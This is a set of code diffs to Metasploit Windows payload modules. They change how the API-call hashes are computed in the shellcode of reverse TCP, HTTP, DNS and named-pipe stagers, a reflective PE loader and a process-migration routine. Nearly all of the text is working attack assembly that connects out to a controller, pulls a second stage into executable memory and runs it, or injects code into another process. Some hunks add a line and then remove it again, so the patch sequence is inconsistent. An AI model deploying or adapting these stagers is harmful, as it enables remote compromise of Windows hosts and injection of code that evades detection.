     ^
     
     # Check to see if we can find exitfunc in the payload
     exitfunc_block_asm = %Q^
     exitfunk:
-      mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")}    ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
-      push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")}    ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
+      push #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
       call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye       ; Then just call the exit function...
       cmp bl, 0xE0            ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye:                 ; We now perform the actual call to the exit function
+      mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye:                 ; We now perform the actual call to the exit function
     goodbye:  
       push 0x0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -135,7 +135,7 @@ module Msf::Payload::Windows::PrependMigrate
       add esp,-400              ; adjust the stack to avoid corruption
       lea edx,[esp+0x60]
       push edx
-      push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")}           ; hash( "kernel32.dll", "GetStartupInfoA" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")}           ; hash( "kernel32.dll", "GetStartupInfoA" )
       call ebp                  ; GetStartupInfoA( &si );
 
       lea eax,[esp+0x60]        ; Put startupinfo pointer back in eax
@@ -158,7 +158,7 @@ module Msf::Payload::Windows::PrependMigrate
       push esi                  ; lpCommandLine
       push ebx                  ; lpApplicationName
 
-      push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")}           ; hash( "kernel32.dll", "CreateProcessA" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")}           ; hash( "kernel32.dll", "CreateProcessA" )
       call ebp                  ; CreateProcessA( &si );
 
       ; if we didn't get a new process, use this one
@@ -186,7 +186,7 @@ module Msf::Payload::Windows::PrependMigrate
       xor ebx,ebx
       push ebx                  ; address
       push [edi]                ; handle
-      push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
       call ebp                  ; VirtualAllocEx( ...);
 
       ; eax now contains the destination
@@ -198,7 +198,7 @@ module Msf::Payload::Windows::PrependMigrate
       begin_of_payload_return:  ; lpBuffer
       push eax                  ; lpBaseAddress
       push [edi]                ; hProcess
-      push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
       call ebp                  ; WriteProcessMemory( ...)
 
       ; run the code (CreateRemoteThread())
@@ -210,7 +210,7 @@ module Msf::Payload::Windows::PrependMigrate
       push ebx                  ; stacksize
       push ebx                  ; lpThreadAttributes
       push [edi]
-      push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
       call ebp                  ; CreateRemoteThread( ...);
 
       #{exitblock}              ; jmp to exitfunc or long sleep
@@ -244,21 +244,21 @@ module Msf::Payload::Windows::PrependMigrate
       ;sleep
       xor rcx,rcx
       dec rcx                   ; rcx = -1
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")}      ; hash( "kernel32.dll", "Sleep" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")}      ; hash( "kernel32.dll", "Sleep" )
       call rbp                  ; Sleep( ... );
     EOS
 
     exitfunc_block_asm = %Q^
     exitfunk:
-      mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")}   ; The EXITFUNK as specified by user...
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}  ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")}   ; The EXITFUNK as specified by user...
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")}  ; hash( "kernel32.dll", "GetVersion" )
       call rbp              ; GetVersion(); (AL will = major version and AH will = minor version)
       add rsp, 40           ; cleanup the default param space on stack
       cmp al, 0x6           ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye            ; Then just call the exit function...
       cmp bl, 0xE0          ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye           ;
-      mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}   ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")}   ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                ; We now perform the actual call to the exit function
       push 0x0              ;
       pop rcx               ; set the exit function parameter
@@ -311,7 +311,7 @@ module Msf::Payload::Windows::PrependMigrate
       ; get our own startupinfo at esp+0x60
       add rsp,-400              ; adjust the stack to avoid corruption
       lea rcx,[rsp+0x30]
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")}       ; hash( "kernel32.dll", "GetStartupInfoA" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")}       ; hash( "kernel32.dll", "GetStartupInfoA" )
       call rbp                  ; GetStartupInfoA( &si );
 
       jmp getcommand
@@ -333,7 +333,7 @@ module Msf::Payload::Windows::PrependMigrate
       mov r8, rcx               ; lpProcessAttributes
       mov rdx, rsi              ; lpCommandLine
       ; rcx is already zero     ; lpApplicationName
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")}      ; hash( "kernel32.dll", "CreateProcessA" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")}      ; hash( "kernel32.dll", "CreateProcessA" )
       call rbp                  ; CreateProcessA( &si );
 
       ; if we didn't get a new process, use this one
@@ -363,7 +363,7 @@ module Msf::Payload::Windows::PrependMigrate
     migrate_asm << <<-EOS
       xor rdx,rdx               ; address
       mov rcx, [rdi]            ; handle
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")}       ; hash( "kernel32.dll", "VirtualAllocEx" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")}       ; hash( "kernel32.dll", "VirtualAllocEx" )
       call rbp                  ; VirtualAllocEx( ...);
 
       ; eax now contains the destination - save in ebx
@@ -377,7 +377,7 @@ module Msf::Payload::Windows::PrependMigrate
       pop r8                    ; lpBuffer
       mov rdx, rax              ; lpBaseAddress
       mov rcx, [rdi]            ; hProcess
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")}      ; hash( "kernel32.dll", "WriteProcessMemory" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")}      ; hash( "kernel32.dll", "WriteProcessMemory" )
       call rbp                  ; WriteProcessMemory( ...);
 
       ; run the code (CreateRemoteThread())
@@ -389,7 +389,7 @@ module Msf::Payload::Windows::PrependMigrate
       mov r8, rcx               ; stacksize
       ;rdx already equals 0     ; lpThreadAttributes
       mov rcx, [rdi]
-      mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")}      ; hash( "kernel32.dll", "CreateRemoteThread" )
+      mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")}      ; hash( "kernel32.dll", "CreateRemoteThread" )
       call rbp                  ; CreateRemoteThread( ...);
 
       #{exitblock}              ; jmp to exitfunc or long sleep

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -4,6 +4,7 @@ module Msf
   module Payload::Windows::ReflectivePELoader
     include Payload::Windows::BlockApi
     def asm_reflective_pe_loader(opts)
+      block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
 
       prologue = ''
       if opts[:is_dll] == true
@@ -33,7 +34,7 @@ start:                    ;
   push 0x103000           ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE
   push dword [esp+12]     ; dwSize
   push 0x00               ; lpAddress
-  push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+  push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
   call ebp                ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
   push eax                ; Save the new image base to stack
   xor edx,edx             ; Zero out the edx
@@ -129,7 +130,7 @@ LoadLibraryA:
   push ecx                ; Save ecx to stack
   push edx                ; Save edx to stack
   push eax                ; Push the address of linrary name string
-  push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}         ; ror13( "kernel32.dll", "LoadLibraryA" )
+  push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}         ; ror13( "kernel32.dll", "LoadLibraryA" )
   call ebp                ; LoadLibraryA([esp+4])
   pop edx                 ; Retrieve edx
   pop ecx                 ; Retrieve ecx
@@ -139,7 +140,7 @@ GetProcAddress:
   push edx                ; Save edx to stack
   push eax                ; Push the address of proc name string
   push ebx                ; Push the dll handle
-  push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}         ; ror13( "kernel32.dll", "GetProcAddress" )
+  push #{block_api_hash('kernel32.dll', 'GetProcAddress')}         ; ror13( "kernel32.dll", "GetProcAddress" )
   call ebp                ; GetProcAddress(ebx,[esp+4])
   pop edx                 ; Retrieve edx
   pop ecx                 ; Retrieve ecx

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -4,8 +4,6 @@ module Msf
   module Payload::Windows::ReflectivePELoader
     include Payload::Windows::BlockApi
     def asm_reflective_pe_loader(opts)
-      block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
-
       prologue = ''
       if opts[:is_dll] == true
         prologue = %(

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -81,6 +81,7 @@ module Payload::Windows::ReverseHttp
   # Generate and compile the stager
   #
   def generate_reverse_http(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -246,7 +247,7 @@ module Payload::Windows::ReverseHttp
         push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
         push 0x696e6977        ; ...
         push esp               ; Push a pointer to the "wininet" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "wininet" )
         xor ebx, ebx           ; Set ebx to NULL to use in future arguments
     ^
@@ -285,7 +286,7 @@ module Payload::Windows::ReverseHttp
       ^
     end
     asm << %Q^
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+      push #{block_api_hash('wininet.dll', 'InternetOpenA')}
       call ebp
     ^
 
@@ -302,7 +303,7 @@ module Payload::Windows::ReverseHttp
         db "#{opts[:url]}", 0x00
       got_server_host:
         push eax               ; HINTERNET hInternet (still in eax from InternetOpenA)
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
+        push #{block_api_hash('wininet.dll', 'InternetConnectA')}
         call ebp
         mov esi, eax           ; Store hConnection in esi
     ^
@@ -321,7 +322,7 @@ module Payload::Windows::ReverseHttp
                              ; LPVOID lpBuffer (username from previous call)
         push 43              ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
         push esi             ; hConnection
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end
@@ -337,7 +338,7 @@ module Payload::Windows::ReverseHttp
                              ; LPVOID lpBuffer (password from previous call)
         push 44              ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
         push esi             ; hConnection
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end
@@ -352,7 +353,7 @@ module Payload::Windows::ReverseHttp
         push edi               ; server URI
         push ebx               ; method
         push esi               ; hConnection
-        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+        push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
         call ebp
         xchg esi, eax          ; save hHttpRequest in esi
      ^
@@ -379,7 +380,7 @@ module Payload::Windows::ReverseHttp
         push eax               ; &dwFlags
         push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
         push esi               ; hHttpRequest
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end
@@ -406,14 +407,14 @@ module Payload::Windows::ReverseHttp
 
     asm << %Q^
         push esi               ; hHttpRequest
-        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
+        push #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
         call ebp
         test eax,eax
         jnz allocate_memory
 
      set_wait:
         push #{retry_wait}     ; dwMilliseconds
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        push #{block_api_hash('kernel32.dll', 'Sleep')}
         call ebp               ; Sleep( dwMilliseconds );
       ^
 
@@ -442,7 +443,7 @@ module Payload::Windows::ReverseHttp
     else
       asm << %Q^
     failure:
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+      push #{block_api_hash('kernel32.dll', 'ExitProcess')}
       call ebp
       ^
     end
@@ -459,7 +460,7 @@ module Payload::Windows::ReverseHttp
       push 4                 ; bytes to read
       push eax               ; &stage size
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+      push #{block_api_hash('wininet.dll', 'InternetReadFile')}
       call ebp               ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
       pop ebx                ; bytesRead (unused, pop for cleaning)
       pop ebx                ; stage size
@@ -470,7 +471,7 @@ module Payload::Windows::ReverseHttp
       push 0x1000            ; MEM_COMMIT
       push ebx               ; Stage allocation
       push eax               ; NULL as we dont care where the allocation is
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+      push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
     download_prep:
       xchg eax, ebx          ; place the allocated base address in ebx
@@ -482,7 +483,7 @@ module Payload::Windows::ReverseHttp
       push eax               ; read length
       push ebx               ; buffer
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+      push #{block_api_hash('wininet.dll', 'InternetReadFile')}
       call ebp
       test eax,eax           ; download failed? (optional?)
       jz failure
@@ -495,7 +496,7 @@ module Payload::Windows::ReverseHttp
       push 0x1000            ; MEM_COMMIT
       push 0x00400000        ; Stage allocation (4Mb ought to do us)
       push ebx               ; NULL as we dont care where the allocation is
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+      push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
     download_prep:
@@ -509,7 +510,7 @@ module Payload::Windows::ReverseHttp
       push 8192              ; read length
       push ebx               ; buffer
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+      push #{block_api_hash('wininet.dll', 'InternetReadFile')}
       call ebp
 
       test eax,eax           ; download failed? (optional?)

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -81,7 +81,6 @@ module Payload::Windows::ReverseHttp
   # Generate and compile the stager
   #
   def generate_reverse_http(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -59,7 +59,6 @@ module Payload::Windows::ReverseNamedPipe
   # Generate and compile the stager
   #
   def generate_reverse_named_pipe(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -59,6 +59,7 @@ module Payload::Windows::ReverseNamedPipe
   # Generate and compile the stager
   #
   def generate_reverse_named_pipe(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -126,7 +127,7 @@ module Payload::Windows::ReverseNamedPipe
         db "#{full_pipe_name}", 0x00
       get_pipe_name:
                                 ; lpFileName (via call)
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
+        push #{block_api_hash('kernel32.dll', 'CreateFileA')}
         call ebp                ; CreateFileA(...)
 
         ; If eax is -1, then we had a failure.
@@ -147,7 +148,7 @@ module Payload::Windows::ReverseNamedPipe
     else
       asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end
@@ -172,7 +173,7 @@ module Payload::Windows::ReverseNamedPipe
         push 4                  ; nNumberOfBytesToRead = sizeof( DWORD );
         push esi                ; lpBuffer
         push edi                ; hFile
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        push #{block_api_hash('kernel32.dll', 'ReadFile')}
         call ebp                ; ReadFile(...) to read the size
     ^
 
@@ -195,7 +196,7 @@ module Payload::Windows::ReverseNamedPipe
         push 0x1000             ; MEM_COMMIT
         push esi                ; push the newly received second stage length.
         push 0                  ; NULL as we dont care where the allocation is.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax           ; ebx = our new memory address for the new stage
@@ -217,7 +218,7 @@ module Payload::Windows::ReverseNamedPipe
         push ecx                ; nNumberOfBytesToRead
         push ebx                ; lpBuffer
         push edi                ; hFile
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        push #{block_api_hash('kernel32.dll', 'ReadFile')}
         call ebp                ; ReadFile(...) to read the data
     ^
 
@@ -237,7 +238,7 @@ module Payload::Windows::ReverseNamedPipe
         push 0x4000             ; dwFreeType (MEM_DECOMMIT)
         push 0                  ; dwSize
         push eax                ; lpAddress
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        push #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call ebp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
         ; restore the stack (one more pop after 2nd ReadFile call)
         pop esi
@@ -245,7 +246,7 @@ module Payload::Windows::ReverseNamedPipe
       cleanup_file:
         ; clear up the named pipe handle
         push edi                ; named pipe handle
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+        push #{block_api_hash('kernel32.dll', 'CloseHandle')}
         call ebp                ; CloseHandle(...)
 
         ; restore the stack back to the connection retry count

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -62,6 +62,7 @@ module Payload::Windows::ReverseTcp
   # Generate and compile the stager
   #
   def generate_reverse_tcp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -118,7 +119,7 @@ module Payload::Windows::ReverseTcp
         push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         mov eax, ebp
         call eax                ; LoadLibraryA( "ws2_32" )
 
@@ -126,7 +127,7 @@ module Payload::Windows::ReverseTcp
         sub esp, eax            ; alloc some space for the WSAData structure
         push esp                ; push a pointer to this struct
         push eax                ; push the wVersionRequested parameter
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp                ; WSAStartup( 0x0190, &WSAData );
 
       set_address:
@@ -145,7 +146,7 @@ module Payload::Windows::ReverseTcp
         push eax                ; push SOCK_STREAM
         inc eax                 ;
         push eax                ; push AF_INET
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
     ^
@@ -168,7 +169,7 @@ module Payload::Windows::ReverseTcp
         push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
         push esi               ; pointer to the sockaddr_in struct
         push edi               ; socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        push #{block_api_hash('ws2_32.dll', 'bind')}
         call ebp               ; bind( s, &sockaddr_in, 16 );
         push #{encoded_host}    ; host in little-endian format
         push #{encoded_port}    ; family AF_INET and port number
@@ -181,7 +182,7 @@ module Payload::Windows::ReverseTcp
         push 16                 ; length of the sockaddr struct
         push esi                ; pointer to the sockaddr struct
         push edi                ; the socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        push #{block_api_hash('ws2_32.dll', 'connect')}
         call ebp                ; connect( s, &sockaddr, 16 );
 
         test eax,eax            ; non-zero means a failure
@@ -201,7 +202,7 @@ module Payload::Windows::ReverseTcp
     else
       asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end
@@ -231,7 +232,7 @@ module Payload::Windows::ReverseTcp
         push 4                  ; length = sizeof( DWORD );
         push esi                ; the 4 byte buffer on the stack to hold the second stage length
         push edi                ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -251,7 +252,7 @@ module Payload::Windows::ReverseTcp
         push 0x1000             ; MEM_COMMIT
         push esi                ; push the newly received second stage length.
         push 0                  ; NULL as we dont care where the allocation is.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax           ; ebx = our new memory address for the new stage
@@ -262,7 +263,7 @@ module Payload::Windows::ReverseTcp
         push esi                ; length
         push ebx                ; the current address into our second stage's RWX buffer
         push edi                ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, buffer, length, 0 );
     ^
 
@@ -278,13 +279,13 @@ module Payload::Windows::ReverseTcp
         push 0x4000             ; dwFreeType (MEM_DECOMMIT)
         push 0                  ; dwSize
         push eax                ; lpAddress
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        push #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call ebp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
 
       cleanup_socket:
         ; clear up the socket
         push edi                ; socket handle
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        push #{block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp                ; closesocket(socket)
 
         ; restore the stack back to the connection retry count

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -62,7 +62,6 @@ module Payload::Windows::ReverseTcp
   # Generate and compile the stager
   #
   def generate_reverse_tcp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb
@@ -46,7 +46,6 @@ module Payload::Windows::ReverseTcpDns
   # Generate and compile the stager
   #
   def generate_reverse_tcp_dns(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb
@@ -46,6 +46,7 @@ module Payload::Windows::ReverseTcpDns
   # Generate and compile the stager
   #
   def generate_reverse_tcp_dns(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -79,14 +80,14 @@ module Payload::Windows::ReverseTcpDns
         push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp                ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
         sub esp, eax           ; alloc some space for the WSAData structure
         push esp               ; push a pointer to this struct
         push eax               ; push the wVersionRequested parameter
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp               ; WSAStartup( 0x0190, &WSAData );
 
         push eax               ; if we succeed, eax will be zero, push zero for the flags param.
@@ -97,7 +98,7 @@ module Payload::Windows::ReverseTcpDns
         push eax               ; push SOCK_STREAM
         inc eax                ;
         push eax               ; push AF_INET
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
@@ -108,7 +109,7 @@ module Payload::Windows::ReverseTcpDns
         db "#{opts[:host]}", 0x00
 
       got_hostname:
-        push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )}
+        push #{block_api_hash( "ws2_32.dll", "gethostbyname" )}
         call ebp               ; gethostbyname( "name" );
 
       set_address:
@@ -122,7 +123,7 @@ module Payload::Windows::ReverseTcpDns
         push 16                ; length of the sockaddr struct
         push esi               ; pointer to the sockaddr struct
         push edi               ; the socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        push #{block_api_hash('ws2_32.dll', 'connect')}
         call ebp               ; connect( s, &sockaddr, 16 );
 
         test eax,eax           ; non-zero means a failure
@@ -142,7 +143,7 @@ module Payload::Windows::ReverseTcpDns
     else
       asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -41,6 +41,7 @@ module Payload::Windows::ReverseTcpRc4
   # Generate and compile the stager
   #
   def generate_reverse_tcp_rc4(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
